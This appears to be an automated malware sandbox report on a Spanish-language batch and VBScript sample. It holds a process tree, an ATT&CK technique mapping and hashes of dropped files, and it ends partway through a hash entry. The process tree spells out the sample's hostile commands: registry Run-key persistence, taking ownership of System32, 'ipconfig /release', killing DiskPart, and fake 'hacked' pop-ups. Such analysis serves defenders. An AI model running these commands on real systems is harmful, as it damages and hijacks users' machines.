C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12712

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:12932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:13100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:12088

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
6⤵
PID:8088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:1520

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
6⤵
PID:6632

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:7524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:12676

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8104

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:3812

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:13212

C:\Windows\system32\calc.exe
calc
4⤵
PID:12384

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:12844

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:640

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:13140

C:\Windows\system32\calc.exe
calc
4⤵
PID:6180

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:10000

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:12952

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6516

C:\Windows\system32\calc.exe
calc
3⤵
PID:6536

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6664

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:9604

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
5⤵
PID:9992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:9900

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:9332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:9464

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:3996

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:4924

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:1252

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:3792

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:3544

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:10096

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10800

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11040

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:4844

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6756

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5792

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:8820

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11088

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11304

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:11488

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:11972

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:6056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:10116

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:11916

C:\Windows\system32\calc.exe
calc
4⤵
PID:8964

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:12104

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:9528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:8412

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:9012

C:\Windows\system32\calc.exe
calc
4⤵
PID:5892

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:6220

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:9976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:6048

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:12332

C:\Windows\system32\calc.exe
calc
4⤵
PID:12468

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:12588

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:12736

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6884

C:\Windows\system32\calc.exe
calc
3⤵
PID:6992

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7000

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7032

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:6036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:7596

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:7348

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:7152

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:7772

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:7904

C:\Windows\system32\notepad.exe
notepad
2⤵
PID:4280

C:\Windows\system32\calc.exe
calc
2⤵
PID:2660

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies registry class
PID:4656

C:\Windows\system32\mspaint.exe
mspaint.exe
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3284

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:5284

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:5548

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:5880

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:5988

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:6124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:3576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4224

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:972

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5096

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:224

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6644

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6788

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6560

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6408

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6360

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7708

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8020

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7552

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7880

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1468

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10376

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10620

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5972

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11148

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5564

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7928

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12636

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5624

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12992

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12472

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10924

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12684

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11316

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
240B

MD5
482dcfe952218cf31ad2adddd8f6616b

SHA1
7a6bcfce28c76bc3319c871696531d21200f3bc0

SHA256
093b0f0c3f7a9bf24406662245b57f171837a266aba49f198319045e971e77d5

SHA512
440182ba5cd7c85abc11fe9097a41486469afde738d26f471efe4e7928106cd57240b1045bc97d60c42147ca25b032c4149487f1a1ab4581292c7eff2bc801b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
300B

MD5
88a2fcd93445c8b092324fe1236d31dc

SHA1
f63653fe34d54b7e42e29689a934ed097329128d

SHA256
0783070444c465de8a21f7fc41f61d2bd535e995454e4086b2e01780e96ad419

SHA512
3e44cce194b1cc3d6946d33dee6756f0333edc886f9ebe8149887c2e9b35867575ed47f15b2c384ed37aab3b8e37dae3369e1259d132bdf9bb832c70c09e8085

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
360B

MD5
8d485f3ac2acb6e586e8f1d8af2df57f

SHA1
43e9653ecedbad263a5e015ecaa3eebb7a44feb9

SHA256
530f6ebaf4445acb0855efc516729598a3312aeedd0ef9024da6f347f152e783

SHA512
4105fa612f86d46457f77449c095cd9e1f59dcb4d137bf3d822e4f52f89c517faadfbaa00b07d15aabfc0d2afdb093ea63d59add313525149f17b7427917494b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
364B

MD5
8a1e8a336fb4639a5f9f85e4417516ac

SHA1
0c2393a558f68d22eb50ac95c268ed66c9f883c0

SHA256
2776104023c77a2449874fe9b993f60c888d5cf39c0dec6af58f6de3ad60891e

SHA512
af20a4c27eac58291bd6d3f5ea3c84d0f4664b2e0976e539a24a697d63915150e8109be34bd090152b9d2811fd7474ce4a15a606d839dc06fee763a77d648e3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
418B

MD5
36f91be4ea85d6c60d2510f11c262450

SHA1
2f237de20b3fda59a95715b594f7c2cbb62780ef

SHA256
26b6058b26dae9bad82e905cefd2af33c3e2d05ecad36a8acf6a463ce7146a8a

SHA512
1fe07ef12945c6b6a55d3bf79021b1f91db914eebfe14f6b37a774b7fb6acbe0fb4a049c288a51d4a5e96a74a84031efc39627b5b23ed65570890b3e20208352

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
422B

MD5
e6005e421d9766162aefe5b9059d92ef

SHA1
27744401691c560cefdc459dc46893812fa37899

SHA256
205bbec740eedef0e9197effc84e441ba37bae4e95a25df929b738f07a7ef65e

SHA512
97c43d4f912fd16117bcf56d0f2c4206ccd8328a0296510894b5998c96ee21ca3d7366971aa55c0985f0b06da67ebd18a7f0771c4bef4adfb7f9d84455580a4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
472B

MD5
e03ab991e39b2cc5f61a97a8005484b3

SHA1
7e15add76c5198dda5878df2165c0075d5f80a02

SHA256
354afbd52e763d4f7a061269b92fd33bcf18072bcc27a37efc730ab232017c2a

SHA512
50e745449a5c9fedb85cb77235f9c4cfefc35444fc6c3a39425f3662cf436d65ec29ca8cca1ec765668d90c9f62be4c4a073cdae5dec14091675990ad292ed99

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
60B

MD5
11aa52a7eca2cf8fdcd1584b5a8b6026

SHA1
01ae6066e6b3879cb0caf306cc91077b7c0bea1e

SHA256
8dfd0a6db2df60455840dbbbcc4f8b70d730ba1c2afbf300316898b3dd3e9b11

SHA512
07f37c050eb59e7a1a228ca851d05ca9b62bb3de97f988fb36c374c827833c8c551e5cb51eb05130861c0b35515ca77ae667ca97ee4f08c86cdf9f6fb64533c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
124B

MD5
9405c1b285eae838c1668b989757c5c0

SHA1
00630d4b84e3a1cf7b48d579bfd0d40503894cc5

SHA256
bbd4c13edfbcf576f6a9d61bffd41442ae08b1b0b064d3a9c10670d73cda2691

SHA512
64516ca2a771500a29dbe26ac2637445f9007a9bd904f479d191157cd59105e809c7858c059be5734c6e4a124930c651978321a07dd0fdf945a66d7b194fed8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
296B

MD5
b20421aba6b1738af56e402aed7b5fca

SHA1
7b9e8f147c25a383e775cf4ce66fec5f050f8187

SHA256
2b11af7c3e34fcb9851881ecb06ee601696a6e29b3d3f283f79b118bdba35ecd

SHA512
32eb6ae6c4009d43422f6abad7cd88f21b3efbd85c4a8c1fa45675f59f5c7a1d0839c6f73131522de5c0f5f1cec2dc9b4e2b00dbe68e060390cc5b6174ef9683

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
444B

MD5
929d76643e667f8d6faa590f5cfee782

SHA1
e120fdfc91c88681f835b703c336908b9cd4b649

SHA256
dedb3209e6ffe8a68578145eda5a34b9f64108c4ccb3b228fb9fa3d7ada5380a

SHA512
bfd61aaf55a50d3c4bbb0386ac02aebfdf14fb8d009bc47eb0e6398b49229222e3c0b7d23b22b235efa14398d6340084d0b9b683bbd9c3ab2f66c0a6d27a4171

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
210B

MD5
95cc1e097d7663506eb09a5526dddb43

SHA1
6e3a4a7ec62920f45f935d8153507d552462969e

SHA256
d2d61148bf3befe5af5c277e726f487e7bbc833a7f8783013b4b3076885e0f25

SHA512
136608646ee72f0df3dad077ec45b5487b99c7633351b239b2c072574958896c8e2f59c67c814963acb5ff85cc6f499587e0b5163c56a95cc3dd4dd96ec3982f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
216B

MD5
7659392a12010d8c761cb9888f6fd5ac

SHA1
b8829c26628740b77ab7405c231f420e860d8c1f

SHA256
71bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431

SHA512
5caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
270B

MD5
adad2cd23a8880d4b3bdb1481c5b7998

SHA1
823fc1acc3e7a3f0cffab5cb8fa453a8c0d1872c

SHA256
838ba55eb15df2e0145178a20b4d01314d0fcde04ff871649012eaeba6bbfb69

SHA512
8c600e32157daef85549d0a19a40f38e812e05cbf24e51453fa1ea94435e55fe4a705e77d42a4f63f3c565da98b4e69f1ed7bb6f3dbca65e80b17526954e60e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
278B

MD5
a8217e02508029f70e586635bc6db873

SHA1
ab19e9a21282b68f2c8c67953105ab95b05e6168

SHA256
9aea836aed56a879f2b62d11ca2d35f4a56620956d6bc9fa2bbf4aee24249787

SHA512
33074686fa13c9bf8225e5bdce20ade67a4d8170c1595fed599f6716415ffc42e6b7376eda032079c4a2048d5df78c1f2b19c5825889ce6589315e487b77880a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
322B

MD5
884f70a3ed9a7041b56cc7ba0406690a

SHA1
cbc662c19bc17f4a3bc65023756d119524be41c7

SHA256
2c77a2b0c246250654e81db9bd70c37a2b63ad5599e0a596a023c637f56b18dc

SHA512
5137be404bb3cffaee68de2ec098f8f1082ad8d8721ce393d3a8eb0b9a19016f952e08b36211c747f1da429643b59c351ed08f04f14750d186f1206e57fa7bda

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
372B

MD5
202ee189b9ff22489d7a78927b33ce16

SHA1
df1271f89a78a3d81284da3bba733aa55405d134

SHA256
c494c2a32396c8986bc080ae1f6b27f0eb20a2ef6313de3c52d80e65aae50b18

SHA512
3202f32a8198995fc7fe78a20a6d10c77fa56bec68470636cf04b779d718b297ab83f113387d4112b0f2641651bfcf4bf75ef0db41cab8e64ef71850f19ef143

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
378B

MD5
5f0f3520c7a8ad2f7615a078ab7f2c27

SHA1
b14a9682cdc497b591b9fa49862d1836866f4118

SHA256
bf87cfcd1055e3750624ecae6ff5a20c17f16eb6c1157452ffc47291554f958b

SHA512
f017fe043ac9c251bdaae7718917b4320f1730b4b61137642e1b08415b1362e70b4018e36a79ea3d79dc877fe6e39cb95455e40e1daa4fce70d9dc3d83126cb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
438B

MD5
8e73772231c96ac082deedd0f0432dbf

SHA1
b16522532236762305736c69b174cbefe8935ddd

SHA256
1e08a9083870173f8672f8aa8d1270212fe2b4dbb8047d4a90998f109e59a644

SHA512
028fa984a25fe9fdb6c843da68bd09b0ce80ec4a8a445c64906f4dbb2e708988195f691f0df8f67633b7883e50c3864079b86706e18a2af8143d659f085e9657

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
54B

MD5
888e64c554686bbbc0499057cce1af36

SHA1
5a7f51c66e3ae7dd0e0231c9817aee8c9fc54006

SHA256
616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d

SHA512
9882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
162B

MD5
d5980bf4b018e4c397df95afe8941c66

SHA1
ce53c669a898d09479831bc59bc31a5fba2a6f2b

SHA256
9afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a

SHA512
c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
138B

MD5
fdac6c0d6442c0cfe7c0b69e80227f0a

SHA1
d0d9aea2bf7a4bf1b45237e2207d37830a578d8c

SHA256
b759fa635b2bbce2570feea401c7d2a9735844d204f5bcdbc88f3a3a761f3959

SHA512
7e5dc4b0876173f05f69f523d50ad573f5dfced10a771d1b28315c2a068b6f6c39ae5edd2433223f79e7d32b9180801746c9621de02cba026f93412b83339da4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
276B

MD5
56fb45e61328c7fcc46ebfad5b6ef006

SHA1
e4a64ed2fcd8cfd3c876f6783f8c680e26471067

SHA256
c9266485a4682ce1e7af4f43e3e6ec8c8ca9ca2f0f7419e55c6ea994f4ebad67

SHA512
2b87dc214d601090e9bf15eed09e50dae94f80a9c2c6ed7f5738fc059dddbea8c93ba5fd64fb0e7cbfb7cae6fcd0dbd70e63bbb2076b50d61e7ee6774c022ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
345B

MD5
68cb8a2e1d2ad6f48b8b8bfc660323ac

SHA1
5fcdbb8e077e261fbc18160c8b494c8b630f18f1

SHA256
5a23b4e966854b82d9e37b9f495829ce8ad358adb6e5d53fc50195fd9aac7be9

SHA512
d0512547758ebf8eee9e84528a4244d080aa7d5a52edc1df563ee36190879063fff8bf56baba69e6b050dc580e661b104a714c415d98b169541155cda2f7f6e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
418B

MD5
83ed13f5329cb95a4828df96909182fd

SHA1
a76a73ca183a5ea7c475a0b11811d44879f5b2e1

SHA256
9825e089bff954207d5055cdb8d157f8dce45015eab39780f06dcade1807a6a9

SHA512
1d60b98284735f59a88f0938ac3c709f23ad84ef4a26d6e4a1f5b8bafb67896d65e9d79736e968a00eda2a0b78e48166bcc858ea9706b3ec91bf59815e37f54c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
69B

MD5
72946942abf5cf295f726b816c531ebf

SHA1
8ac5ccae8003c3776c2e0ee0959a76c8bc913495

SHA256
d9fc0446467e00e640f0dd0bf36882943a6993dcc1038ba8f73239152896eb25

SHA512
2f42b10e2c1359a690e1a69e307008e3beb4712e4c071d916fb1380c61cb2ed3ae48c86af44c6f1c9d613e85dd75d8cfd66fd01de0649444ee6d5193d9789d23

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
692B

MD5
6989502044e4a9fca67e9ded25de9956

SHA1
9a8d099caad939d32599530b27f7db641cbdb8da

SHA256
b370b54e95376f4b6df27592bc23343c82ebbfad3d52e71a38a2aac504bda04c

SHA512
9f0e6d59d9adc531f5c162b964205e0dd63c6a956291af48d24e6b8988a940b6f2cc7644a9163277e6383a6d9f8ddb00c9687d73426ea776c691e73f66e95a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
865B

MD5
5dfd819273a34eeb1a213e66dd8308a7

SHA1
65291936bcbe05742a6bc15d989d5e3acff59998

SHA256
7699fff0e361a55cce19ca7922fae4f70eb6ca56b770223fab5d1fd936b0a184

SHA512
d19cf3e05df7d5d1f360d20a47e2658d03067cffce1b767bf2e430ebba5f49bcdb37e9c098c195c919682bf90b5a54c508dad587bff3f4c1c73ac6065b019913

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
173B

MD5
0c998e3681eb9f67fbacda38281c5fa7

SHA1
bd3e89780f374c54c5dfbe3fab83a926ca5803de

SHA256
3c656f47268598c5bbe3ee4661b4f8c7dc09420cf393a6e417541db3c6020205

SHA512
11e3fd1d141bd23a2b0f17665f0f57e5a606fdd82555a7bd88cd533863ce4269d8395f8963d1cdfde93efbb0817486db48c3b593f8de35e150e2395daadb762e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
2KB

MD5
48193e27534c8be63320a6616ea08f40

SHA1
ead833b8b97e9281e5cbb9c4be01dddcc00953db

SHA256
bd35d8ce394f896a9f74270ed31bf814da30fc87a6027d7442378a7bcc4543cb

SHA512
2a4064b2ae5c9013f5b986ee2d5171335c97723fc7070e82b41f8d4ec977eab7e1e857c2e35c1d4d1d42b22effe829a5c616ecbc93d43b2bf45c4e0e07940eb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
346B

MD5
4e71aaa85b945ab5dc2680ce12d8474f

SHA1
a00ff196706e8282b02187281a7fa71f20c59eba

SHA256
411d8fc3a482880ec2b56a7193a4104130ca9554f1feb96db27c59a2b61303a5

SHA512
cea3cdb3eb537454ccf9773c80c111d8172dace2c79c62ffe18ac7c4373669d055fd9cc4929f9b6f4f376507a1319e37b0ba26373e40f4332d1acb025792b430

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
18KB

MD5
55eb7f104023e6866add93a57f4bee37

SHA1
5c864c47dd1aaa144293cc7821d9930a3a471b24

SHA256
3570344f603300388fc407eadb0e6a7cf6e67e74218239823fcf4604cf4412bc

SHA512
da389e1aa79925e98bf36537de225ee72755c683459e9f8a3c672c1088892c45e6c57912d541ad09cb6ac8798bb5deb7144d816318c45ead964b8fb75f6a3f7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
23KB

MD5
cc43fa3c37fe282f4e88844c1ecf31ac

SHA1
4466264634463810de91903181bd714b7f1d630c

SHA256
501495195f5491fe72b6b9c86b2b56815c925b68cfa0cb6690f172c38ac3eaf4

SHA512
